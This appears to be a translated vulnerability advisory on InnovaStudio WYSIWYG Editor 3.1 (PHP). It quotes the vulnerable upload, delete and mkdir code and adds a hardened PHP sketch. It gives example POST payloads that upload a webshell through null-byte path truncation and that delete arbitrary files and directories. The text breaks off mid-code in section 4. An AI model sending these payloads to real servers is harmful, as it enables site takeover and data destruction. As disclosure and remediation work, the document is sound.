editor.ctrl.php vulnerability: InnovaStudio WYSIWYG Editor 3.1 [PHP version] arbitrary file upload vulnerability and fix (vulnerability alert)

孟凯泽
2023-12-01

Vulnerability 1: Arbitrary file upload [magic_quotes_gpc=Off]

Vulnerable file: assetmanager.php

POST inpCurrFolder2=/var/www/shell.php%00

Vulnerable code: line 42

if(isset($_FILES["File1"]))
{
    if(isset($_POST["inpCurrFolder2"]))$currFolder=$_POST['inpCurrFolder2']; // the folder is attacker-controlled; with magic_quotes_gpc=off a file can be written to any path
    if(isset($_REQUEST["inpFilter"]))$ffilter=$_REQUEST["inpFilter"];

    if($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))
    {
        $sMsg = "The file exceeds the maximum size allowed.";
    }
    else if(!isTypeAllowed($_FILES['File1']['name']))
    {
        $sMsg = "The File Type is not allowed.";
    }
    else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder."/".basename($_FILES['File1']['name'])))
    {
        $sMsg = "";
        $sUploadedFile=$_FILES['File1']['name'];
        @chmod($currFolder."/".basename($_FILES['File1']['name']), 0644);
    }
    else
    {
        $sMsg = "Upload failed.";
    }
}
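
A hardened counterpart to the upload handler above, as an added example that is not part of the original page or of InnovaStudio's code: it requires a logged-in session and pins the client-supplied folder under a fixed base directory, the two checks the handlers on this page lack. `ASSET_BASE`, the `editor_user` session key, the extension list and all function names are assumptions.

```php
<?php
// Added example, not InnovaStudio code. ASSET_BASE, the session key, the
// extension list and all function names are assumptions made for this sketch.
const ASSET_BASE = '/var/www/assets';
const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png'];

// Gate every asset-manager action on an authenticated session.
function editorLoggedIn(): bool
{
    return session_status() === PHP_SESSION_ACTIVE && !empty($_SESSION['editor_user']);
}

// Map a client-supplied folder to a canonical directory inside $base, or null.
function resolveAssetFolder(string $requested, string $base = ASSET_BASE): ?string
{
    if (strpos($requested, "\0") !== false) {      // the %00 truncation case
        return null;
    }
    $baseReal = realpath($base);
    $real = realpath($requested);                  // resolves ../ and symlinks
    if ($baseReal === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Compare with a trailing separator so /var/www/assets2 is not accepted.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $baseReal && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Upload handler: returns '' on success or an error message.
function storeUpload(array $file, string $requestedFolder): string
{
    if (!editorLoggedIn()) {
        return 'Not authorised.';
    }
    $folder = resolveAssetFolder($requestedFolder);
    $name = basename($file['name']);
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($folder === null || strpos($name, "\0") !== false || !in_array($ext, ALLOWED_EXT, true)) {
        return 'Folder or file type is not allowed.';
    }
    $target = $folder . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return 'Upload failed.';
    }
    chmod($target, 0644);
    return '';
}
```

The same `editorLoggedIn()` and `resolveAssetFolder()` checks belong in front of the `unlink`, `rmdir` and `mkdir` calls shown in sections 2 to 4.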

-------------------

2. Missing access control allows arbitrary file deletion

Vulnerable file: assetmanager.php

[POST] inpFileToDelete=/var/www/index.php

Vulnerable code: line 72

if(isset($_POST["inpFileToDelete"]))
{
    $filename=pathinfo($_POST["inpFileToDelete"]);
    $filename=$filename['basename'];
    if($filename!="")
        unlink($currFolder . "/" . $filename);
    $sMsg = "";
}

-------------------

3. Missing access control allows arbitrary directory deletion

Vulnerable file: folderdel_.php

[POST] inpCurrFolder=/var/www/upload/

Vulnerable code: line 3

if(isset($_POST["inpCurrFolder"]))
{
    $sDestination = pathinfo($_POST["inpCurrFolder"]);

    //DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file);
    closedir($handle);

    if(rmdir($_POST["inpCurrFolder"])==0)
        $sMsg = "";
    else
        $sMsg = "";
}

-------------------

4. Missing access control allows arbitrary directory creation

Vulnerable file: foldernew.php

[POST] inpCurrFolder=/var/www/&inpNewFolderName=123

Vulnerable code: line 3

if(isset($_POST["inpNewFolderName"]))
{
    $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
    if(is_dir($sFolder)==1)
    {//folder already exist
        $sMsg = "";
    }
    else
    {
        //if(mkdir($sFolder))
        if(mkdir($sFolder,0755))
